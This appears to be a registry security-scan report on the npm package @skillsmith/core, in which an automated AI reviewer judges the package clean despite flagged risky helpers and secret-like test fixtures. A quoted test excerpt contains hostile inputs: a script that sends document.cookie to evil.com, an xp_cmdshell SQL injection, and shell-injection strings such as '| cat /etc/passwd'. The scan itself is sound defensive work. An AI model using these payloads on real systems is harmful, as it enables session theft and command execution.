registry  /  @skillsmith/core  /  0.10.0

@skillsmith/core@0.10.0

Core types and utilities for Skillsmith

AI Security Review

scanned 5d ago · by lpm-firewall-ai

No confirmed malicious attack surface is established. Risky primitives are explicit library capabilities for skill installation, session integration, telemetry, and source fetching rather than automatic npm install/import behavior.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
User/runtime code explicitly calls exported Skillsmith helpers
Impact
Expected Skillsmith functionality; no evidence of credential theft, stealth persistence, destructive behavior, or unconsented npm lifecycle mutation
Mechanism
package-aligned filesystem writes, ruflo helper command execution, and telemetry/API fetches
Rationale
Direct source inspection shows scanner hits are mostly tests or package-aligned exported functionality, with no automatic npm lifecycle attack or unconsented foreign AI-agent control-surface mutation. The package should be marked clean despite dual-use helper primitives because activation is user/runtime-invoked and bounded to Skillsmith features.
Evidence
package.jsondist/src/index.jsdist/src/services/skill-installation.io.jsdist/src/session/SessionManager.memory.jsdist/src/session/SessionRecovery.jsdist/src/audit/remote-audit.jsdist/src/sync/inventory-client.jsdist/src/config/token-credentials.jsdist/tests/security/pii-detection.test.jsdist/tests/edge-cases/EdgeCases.test.js~/.skillsmith/config.json~/.skillsmith/agent-markers/*.json~/.claude/agents/<skill>-specialist.md<skillsDir>/<skill>/SKILL.md
Network endpoints5
api.skillsmith.appvrcnzpmndtroqxxoqkzy.supabase.co/auth/v1app.posthog.comapi.github.comraw.githubusercontent.com

Decision evidence

public snapshot
AI called this Clean at 91.0% confidence as Benign with low false-positive risk.
Evidence for block
  • dist/src/services/skill-installation.io.js can write SKILL.md and optional generated subagent to ~/.claude/agents during explicit install helper use.
  • dist/src/session/SessionManager.memory.js and dist/src/session/SessionRecovery.js invoke npx ruflo memory/hooks via injected executor when session helpers are called.
  • dist/src/audit/remote-audit.js and dist/src/sync/inventory-client.js can POST package telemetry/inventory to Skillsmith endpoints when caller has configured credentials.
Evidence against
  • package.json has no preinstall/install/postinstall hook; only prepublishOnly for publisher-side build/test.
  • dist/src/index.js is a barrel export and does not perform install-time or import-time mutation/exfiltration.
  • dist/tests/security/pii-detection.test.js secret-looking strings are synthetic scanner test fixtures.
  • dist/tests/edge-cases/EdgeCases.test.js reverse-shell-like content is adversarial input test data, not executed payload.
  • dist/src/telemetry/posthog.js requires explicit initialization with an API key and filters traits; telemetry no-ops when disabled/uninitialized.
  • Network endpoints are package-aligned: api.skillsmith.app, Supabase auth, GitHub raw/API, PostHog.
Behavioral surface
Source
ChildProcessCryptoDynamicRequireEnvironmentVarsEvalFilesystemNativeBindingsNetworkShell
Supply chain
HighEntropyStringsTelemetryUrlStrings
ManifestNo manifest risk signals triggered.
scanned 656 file(s), 4.54 MB of source, external domains: 0.0.0.0, 0.0.0.1, 0.1.2.3, 0.255.255.255, 1.1.1.1, 1.2.3.4, 10.0.0.1, 10.1.2.3, 10.255.255.255, 127.0.0.1, 127.1.2.3, 127.255.255.255, 142.250.185.46, 169.254.0.1, 169.254.169.254, 169.254.255.255, 172.15.0.1, 172.16.0.1, 172.20.0.1, 172.31.255.255, 172.32.0.1, 192.167.0.1, 192.168.0.1, 192.168.1.1, 192.168.255.255, 192.169.0.1, 256.256.256.256, 8.8.8.8, 999.1.2.3, a.example, api.example.com, api.github.com, api.skillsmith.app, app.posthog.com, attacker.io, b.example, ci.example.com, custom-domain.com, custom-internal.example.com, custom.api.example.com, custom.posthog.com, developer.mozilla.org, docs.anthropic.com, docs.example.com, evil-exfiltration-site.example.com, evil.com, evil.example, evil.example.com, evil.test, example.com

Source & flagged code

18 flagged · loading source
dist/tests/security/pii-detection.test.jsView file
35patternName = github_pat severity = critical line = 35 matchedText = const re...l');
Critical
Critical Secret

Package contains a critical-looking secret pattern.

dist/tests/security/pii-detection.test.jsView on unpkg · L35
35patternName = github_pat severity = critical line = 35 matchedText = const re...l');
Critical
Secret Pattern

GitHub personal access token in dist/tests/security/pii-detection.test.js

dist/tests/security/pii-detection.test.jsView on unpkg · L35
40patternName = aws_access_key severity = critical line = 40 matchedText = const re...E');
Critical
Secret Pattern

AWS access key ID in dist/tests/security/pii-detection.test.js

dist/tests/security/pii-detection.test.jsView on unpkg · L40
78patternName = private_key_rsa severity = critical line = 78 matchedText = const re...-');
Critical
Secret Pattern

RSA private key in dist/tests/security/pii-detection.test.js

dist/tests/security/pii-detection.test.jsView on unpkg · L78
112patternName = aws_access_key severity = critical line = 112 matchedText = 'aws_key...LE',
Critical
Secret Pattern

AWS access key ID in dist/tests/security/pii-detection.test.js

dist/tests/security/pii-detection.test.jsView on unpkg · L112
208patternName = aws_access_key severity = critical line = 208 matchedText = expect(l...ue);
Critical
Secret Pattern

AWS access key ID in dist/tests/security/pii-detection.test.js

dist/tests/security/pii-detection.test.jsView on unpkg · L208
86patternName = generic_password severity = medium line = 86 matchedText = const re..."');
Medium
Secret Pattern

Hardcoded password in dist/tests/security/pii-detection.test.js

dist/tests/security/pii-detection.test.jsView on unpkg · L86
160patternName = generic_password severity = medium line = 160 matchedText = .scan('t...p"')
Medium
Secret Pattern

Hardcoded password in dist/tests/security/pii-detection.test.js

dist/tests/security/pii-detection.test.jsView on unpkg · L160
167patternName = generic_password severity = medium line = 167 matchedText = .scan('t...e"')
Medium
Secret Pattern

Hardcoded password in dist/tests/security/pii-detection.test.js

dist/tests/security/pii-detection.test.jsView on unpkg · L167
dist/src/db/drivers/sqljsDriver.jsView file
178} L179: exec(sql) { L180: this.db.run(sql);
High
Child Process

Package source references child process execution.

dist/src/db/drivers/sqljsDriver.jsView on unpkg · L178
dist/src/telemetry/metric-helpers.jsView file
11try { L12: const importFn = new Function('m', 'return import(m)'); L13: return await importFn(moduleName);
Low
Eval

Package source references a known benign dynamic code generation pattern.

dist/src/telemetry/metric-helpers.jsView on unpkg · L11
dist/src/db/drivers/betterSqlite3Driver.jsView file
12// ESM-compatible require for native modules L13: const require = createRequire(import.meta.url); L14: /**
Medium
Dynamic Require

Package source references dynamic require/import behavior.

dist/src/db/drivers/betterSqlite3Driver.jsView on unpkg · L12
dist/src/scripts/github-import/deduplication.jsView file
1/** L2: * SMI-860: Deduplication for imported skills
Low
Weak Crypto

Package source references weak cryptographic algorithms.

dist/src/scripts/github-import/deduplication.jsView on unpkg · L1
dist/tests/edge-cases/EdgeCases.test.jsView file
103it('should handle binary garbage in SKILL.md', () => { L104: const binaryGarbage = Buffer.from([0x00, 0x01, 0x02, 0xff, 0xfe, 0xfd]).toString(); L105: expect(() => parser.parse(binaryGarbage)).not.toThrow(); ... L371: "' OR ''='", L372: "'; EXEC xp_cmdshell('cmd.exe'); --", L373: '0x27204F52202731273D2731', // Hex encoded ... L434: '{{constructor.constructor("alert(1)")()}}', // Template injection L435: '<script>fetch("evil.com?cookie="+document.cookie)</script>', L436: '<input onfocus=alert(1) autofocus>', ... L542: '; ls -la', L543: '| cat /etc/passwd', L544: '`whoami`',
Critical
Reverse Shell

Source matches reverse-shell style process and socket wiring.

dist/tests/edge-cases/EdgeCases.test.jsView on unpkg · L103
dist/src/session/SessionManager.memory.jsView file
6* @see SMI-3600: Remove dead V3 dynamic imports (claude-flow → ruflo rename) L7: * @see SMI-3601: Migrate npx claude-flow CLI calls to npx ruflo L8: * ... L16: * L17: * SMI-674: Uses spawn() with argument array to prevent command injection L18: * SMI-3601: Migrated from claude-flow to ruflo
High
Runtime Package Install

Package source invokes a package manager install command at runtime.

dist/src/session/SessionManager.memory.jsView on unpkg · L6
dist/src/scripts/github-import/github-auth.jsView file
50patternName = private_key_rsa severity = critical line = 50 matchedText = const is...-');
Critical
Secret Pattern

RSA private key in dist/src/scripts/github-import/github-auth.js

dist/src/scripts/github-import/github-auth.jsView on unpkg · L50
dist/src/api/utils.d.tsView file
53patternName = supabase_service_key severity = critical line = 53 matchedText = export d...t8";
Critical
Secret Pattern

Supabase service role key (JWT) in dist/src/api/utils.d.ts

dist/src/api/utils.d.tsView on unpkg · L53
dist/src/api/utils.jsView file
101patternName = supabase_service_key severity = critical line = 101 matchedText = export c...t8';
Critical
Secret Pattern

Supabase service role key (JWT) in dist/src/api/utils.js

dist/src/api/utils.jsView on unpkg · L101

Findings

10 Critical3 High7 Medium8 Low
CriticalCritical Secretdist/tests/security/pii-detection.test.js
CriticalReverse Shelldist/tests/edge-cases/EdgeCases.test.js
CriticalSecret Patterndist/tests/security/pii-detection.test.js
CriticalSecret Patterndist/tests/security/pii-detection.test.js
CriticalSecret Patterndist/tests/security/pii-detection.test.js
CriticalSecret Patterndist/tests/security/pii-detection.test.js
CriticalSecret Patterndist/tests/security/pii-detection.test.js
CriticalSecret Patterndist/src/scripts/github-import/github-auth.js
CriticalSecret Patterndist/src/api/utils.d.ts
CriticalSecret Patterndist/src/api/utils.js
HighChild Processdist/src/db/drivers/sqljsDriver.js
HighShell
HighRuntime Package Installdist/src/session/SessionManager.memory.js
MediumDynamic Requiredist/src/db/drivers/betterSqlite3Driver.js
MediumNetwork
MediumEnvironment Vars
MediumStructural Risk Force Deep Review
MediumSecret Patterndist/tests/security/pii-detection.test.js
MediumSecret Patterndist/tests/security/pii-detection.test.js
MediumSecret Patterndist/tests/security/pii-detection.test.js
LowNon Install Lifecycle Scripts
LowScripts Present
LowEvaldist/src/telemetry/metric-helpers.js
LowWeak Cryptodist/src/scripts/github-import/deduplication.js
LowFilesystem
LowHigh Entropy Strings
LowTelemetry
LowUrl Strings